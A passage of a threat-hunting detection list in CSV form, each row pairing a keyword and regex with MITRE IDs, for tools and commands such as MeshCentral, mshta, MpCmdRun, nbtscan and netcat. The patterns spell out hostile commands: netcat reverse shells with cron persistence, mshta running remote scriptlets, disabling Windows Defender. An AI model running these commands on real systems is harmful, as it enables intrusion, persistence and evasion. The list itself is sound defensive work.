TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcentral.exe*",".{0,1000}meshcentral\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcentral.serverstats*",".{0,1000}meshcentral\.serverstats.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management 
web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentralAssistant.exe*",".{0,1000}MeshCentralAssistant\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentralInstaller.exe*",".{0,1000}MeshCentralInstaller\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcentralinstaller.exe*",".{0,1000}meshcentralinstaller\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcentral-plugins.db*",".{0,1000}meshcentral\-plugins\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentralRoot-*",".{0,1000}MeshCentralRoot\-.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentralRouter.exe*",".{0,1000}MeshCentralRouter\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentralServer.njsproj*",".{0,1000}MeshCentralServer\.njsproj.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcentral-smbios.db*",".{0,1000}meshcentral\-smbios\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCmd64.exe*",".{0,1000}MeshCmd64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcmdService.run*",".{0,1000}meshcmdService\.run.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*MeshCmd-signed.exe*",".{0,1000}MeshCmd\-signed\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcommander install*",".{0,1000}meshcommander\sinstall.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcommander start*",".{0,1000}meshcommander\sstart.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcommander stop*",".{0,1000}meshcommander\sstop.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshcommander uninstall*",".{0,1000}meshcommander\suninstall.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshConsole64.exe*",".{0,1000}MeshConsole64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshConsoleARM64.exe*",".{0,1000}MeshConsoleARM64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshinstall-initd.sh*",".{0,1000}meshinstall\-initd\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshinstall-linux.sh*",".{0,1000}meshinstall\-linux\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshService.exe*",".{0,1000}MeshService\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*rootcert.meshcentral.com*",".{0,1000}rootcert\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*swarm.meshcentral.com*",".{0,1000}swarm\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*Uploading MeshCommander*",".{0,1000}Uploading\sMeshCommander.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*wss://meshcentral.com*",".{0,1000}wss\:\/\/meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*Ylianst/MeshAgent*",".{0,1000}Ylianst\/MeshAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","1","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*Ylianst/MeshCentral*",".{0,1000}Ylianst\/MeshCentral.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\AppData\Local\CoreAIPlatform.00\UKP\*\ukg.db*",".{0,1000}\\AppData\\Local\\CoreAIPlatform\.00\\UKP\\.{0,1000}\\ukg\.db.{0,1000}","greyware_tool_keyword","Microsoft Recall","data from the Recall feature in Windows 11 - recall is enabled on the computer","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","N/A","1","0","N/A","will trigger if recall is enabled on the computer","8","10","N/A","N/A","N/A","N/A" "*mkdir ~/.bash_history*",".{0,1000}mkdir\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","mkdir","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*modprobe -r*",".{0,1000}modprobe\s\-r.{0,1000}","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","5","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*modprobe --remove*",".{0,1000}modprobe\s\-\-remove.{0,1000}","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","5","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*modprobe rmmod -r*",".{0,1000}modprobe\srmmod\s\-r.{0,1000}","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","5","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*",".{0,1000}movefile64\.exe\s\/nobanner\s.{0,1000}\.dll\sC\:\\Windows\\System32\\amsi\.dll.{0,1000}","greyware_tool_keyword","movefile64.exe","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*MpCmdRun.exe -DownloadFile -url http://*.exe -path *",".{0,1000}MpCmdRun\.exe\s\-DownloadFile\s\-url\shttp\:\/\/.{0,1000}\.exe\s\-path\s.{0,1000}","greyware_tool_keyword","MpCmdRun","MpCmdRun LOLBAS exploitation observed used by threat actors","T1105","TA0009 ","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MpCmdRun.exe* -disable*",".{0,1000}MpCmdRun\.exe.{0,1000}\s\-disable.{0,1000}","greyware_tool_keyword","MpCmdRun","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*MpCmdRun.exe* -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe\s\-RemoveDefinitions\s\-All.{0,1000}","greyware_tool_keyword","MpCmdRun","Wipe currently stored definitions","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*forfiles.exe* /p * /m * /c *powershell . 
mshta*",".{0,1000}forfiles\.exe.{0,1000}\s\/p\s.{0,1000}\s\/m\s.{0,1000}\s\/c\s.{0,1000}powershell\s\.\smshta.{0,1000}","greyware_tool_keyword","mshta","using forfiles and mshta likely to evade detection and execute malicious code. It combines file enumeration with scripting and HTML-based execution which is commonly seen in malware or sophisticated attacks","T1083 - T1059 - T1203","TA0002 - TA0005 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*mshta ""C:\Users\Public\*",".{0,1000}mshta\s\""C\:\\Users\\Public\\.{0,1000}","greyware_tool_keyword","mshta","executing from public folder","T1218.005 - T1059.003 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*mshta http*.hta*",".{0,1000}mshta\shttp.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A" "*mshta https://tinyurl.com/*",".{0,1000}mshta\shttps\:\/\/tinyurl\.com\/.{0,1000}","greyware_tool_keyword","mshta","downloading from tinyurl","T1204.002 - T1105 - T1071.001 - T1102.003","TA0009 ","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*mshta javascript:*script:https:*",".{0,1000}mshta\sjavascript\:.{0,1000}script\:https\:.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A" "*mshta javascript:a=(GetObject(""script:http*.sct*)).Exec();close();*",".{0,1000}mshta\sjavascript\:a\=\(GetObject\(\""script\:http.{0,1000}\.sct.{0,1000}\)\)\.Exec\(\)\;close\(\)\;.{0,1000}","greyware_tool_keyword","mshta","Invoking a scriptlet file hosted 
remotely","T1218.005 - T1059.001 - T1105","TA0002 - TA0009","N/A","N/A","Collection","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*mshta vbscript:Close(Execute(*script:https://*.sct*",".{0,1000}mshta\svbscript\:Close\(Execute\(.{0,1000}script\:https\:\/\/.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A" "*mshta.exe https://tinyurl.com/*",".{0,1000}mshta\.exe\shttps\:\/\/tinyurl\.com\/.{0,1000}","greyware_tool_keyword","mshta","downloading from tinyurl","T1204.002 - T1105 - T1071.001 - T1102.003","TA0009 ","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*mshta.exe javascript:a=(GetObject(""script:http*.sct*)).Exec();close();*",".{0,1000}mshta\.exe\sjavascript\:a\=\(GetObject\(\""script\:http.{0,1000}\.sct.{0,1000}\)\)\.Exec\(\)\;close\(\)\;.{0,1000}","greyware_tool_keyword","mshta","Invoking a scriptlet file hosted remotely","T1218.005 - T1059.001 - T1105","TA0002 - TA0009","N/A","N/A","Collection","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*mshta.exe* ""C:\Users\Public\*",".{0,1000}mshta\.exe.{0,1000}\s\""C\:\\Users\\Public\\.{0,1000}","greyware_tool_keyword","mshta","executing from public folder","T1218.005 - T1059.003 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*mshta.exe* http://*",".{0,1000}mshta\.exe.{0,1000}\shttp\:\/\/.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A" "*mshta.exe* https://*",".{0,1000}mshta\.exe.{0,1000}\shttps\:\/\/.{0,1000}","greyware_tool_keyword","mshta","mshta abused by 
attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A" "*mshta.exe* javascript:*script:https:*",".{0,1000}mshta\.exe.{0,1000}\sjavascript\:.{0,1000}script\:https\:.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A" "*mshta.exe* vbscript:Close(Execute(*script:https://*.sct*",".{0,1000}mshta\.exe.{0,1000}\svbscript\:Close\(Execute\(.{0,1000}script\:https\:\/\/.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A" "*edknjdjielmpdlnllkdmaghlbpnmjmgb*",".{0,1000}edknjdjielmpdlnllkdmaghlbpnmjmgb.{0,1000}","greyware_tool_keyword","Muscle VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*ppajinakbfocjfnijggfndbdmjggcmde*",".{0,1000}ppajinakbfocjfnijggfndbdmjggcmde.{0,1000}","greyware_tool_keyword","My Browser Vpn","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" 
"*https://myexternalip.com/raw*",".{0,1000}https\:\/\/myexternalip\.com\/raw.{0,1000}","greyware_tool_keyword","myexternalip.com","return external ip address","T1046 - T1595 - T1595.001","TA0007 - TA0040","N/A","N/A","Reconnaissance","https://myexternalip.com/raw","1","1","N/A","False positives warning - used by some C2 projects but legitimate site","1","6","N/A","N/A","N/A","N/A" "*.myftp.biz*",".{0,1000}\.myftp\.biz.{0,1000}","greyware_tool_keyword","myftp.biz","dyndns - lots of subdomains associated with malwares - could be used in various ways for both legitimate and malicious activities (malicious mostly)","T1071 - T1021 - T1095 - T1059","TA0010 - TA0008 - TA0009 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/hagezi/dns-blocklists/blob/9d6562bddc175b59241d5935531f648cd6b6d9c8/rpz/dyndns.txt#L103","1","1","N/A","N/A","10","10","5644","197","2024-08-30T12:38:19Z","2022-04-25T07:13:09Z" "*.myftp.org*",".{0,1000}\.myftp\.org.{0,1000}","greyware_tool_keyword","myftp.org","dyndns - lots of subdomains associated with malwares - myftp.org could be used in various ways for both legitimate and malicious activities (malicious mostly)","T1071 - T1021 - T1095 - T1059","TA0010 - TA0008 - TA0009 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/pan-unit42/iocs/blob/master/rat_nest/iocs.csv","1","1","N/A","N/A","10","7","695","151","2024-08-29T23:27:10Z","2015-06-04T13:37:09Z" "*https://api.my-ip.io/ip*",".{0,1000}https\:\/\/api\.my\-ip\.io\/ip.{0,1000}","greyware_tool_keyword","my-ip.io","abused by ransomwares","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","1","#yara","N/A","4","3","294","43","2024-08-30T12:07:16Z","2021-07-28T21:00:52Z" "*nbtscan *.*/24",".{0,1000}nbtscan\s.{0,1000}\..{0,1000}\/24","greyware_tool_keyword","nbtscan","Scan for Active Machines and Gather NetBIOS Information","T1135 - T1046","TA0007 - TA0009","N/A","Dagon 
Locker","Discovery","N/A","1","0","N/A","N/A","5","2","N/A","N/A","N/A","N/A" "*nbtscan -r */24*",".{0,1000}nbtscan\s\-r\s.{0,1000}\/24.{0,1000}","greyware_tool_keyword","nbtscan","smb enumeration","T1135 - T1046","TA0007 - TA0009","N/A","Dagon Locker","Discovery","https://github.com/charlesroelli/nbtscan","1","0","N/A","N/A","5","2","135","27","2016-05-26T20:16:52Z","2016-05-26T20:16:33Z" "*nbtscan -s : *",".{0,1000}nbtscan\s\-s\s\:\s.{0,1000}","greyware_tool_keyword","nbtscan","Identify Potential Points for Man-in-the-Middle Attacks","T1135 - T1046","TA0007 - TA0009","N/A","Dagon Locker","Discovery","N/A","1","0","N/A","N/A","5","2","N/A","N/A","N/A","N/A" "*nbtstat -n*",".{0,1000}nbtstat\s\-n.{0,1000}","greyware_tool_keyword","nbtstat","Displays the NetBIOS name table of the local computer. The status of registered indicates that the name is registered either by broadcast or with a WINS server.","T1049 - T1018 - T1046 - T1016 - T1049","TA0007 - TA0009","N/A","Turla","Discovery","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat","1","0","N/A","N/A","4","10","N/A","N/A","N/A","N/A" "* /bin/nc * -e /bin/bash* > cron && crontab cron*",".{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\s\>\scron\s\&\&\scrontab\scron.{0,1000}","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - T1037","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "* /bin/nc * -e /bin/bash*> * crontab cron*",".{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\>\s.{0,1000}\scrontab\scron.{0,1000}","greyware_tool_keyword","nc","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - 
TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*echo nc -l -p * > *.bat*",".{0,1000}echo\snc\s\-l\s\-p\s.{0,1000}\s\>\s.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","nc","Netcat Relay on windows - create a relay that sends packets from the local port to a netcat client connected to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*nc -l -p * -e *.bat*",".{0,1000}nc\s\-l\s\-p\s.{0,1000}\s\-e\s.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","nc","Netcat Relay on windows - create a relay that sends packets from the local port to a netcat client connected to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*nc -l -p * -e /bin/bash*",".{0,1000}nc\s\-l\s\-p\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","nc","Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connected to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*nc -l -p * -e cmd.exe*",".{0,1000}nc\s\-l\s\-p\s.{0,1000}\s\-e\scmd\.exe.{0,1000}","greyware_tool_keyword","nc","Netcat Backdoor on Windows - create a relay that sends packets from the local port to a netcat client connected to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - 
TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*nc -v -n -z -w1 *-*",".{0,1000}nc\s\-v\s\-n\s\-z\s\-w1\s.{0,1000}\-.{0,1000}","greyware_tool_keyword","nc","Port scanner with netcat","T1046","TA0007","N/A","N/A","Discovery","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","7","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*nc -z -v * *",".{0,1000}nc\s\-z\s\-v\s.{0,1000}\s.{0,1000}","greyware_tool_keyword","nc","netcat common arguments","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ncat * -e /bin/bash*|crontab*",".{0,1000}\sncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\|crontab.{0,1000}","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*ncat * -p 4444*",".{0,1000}ncat\s.{0,1000}\s\-p\s4444.{0,1000}","greyware_tool_keyword","ncat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*MATCH (c:Computer {unconsraineddelegation:true}) RETURN 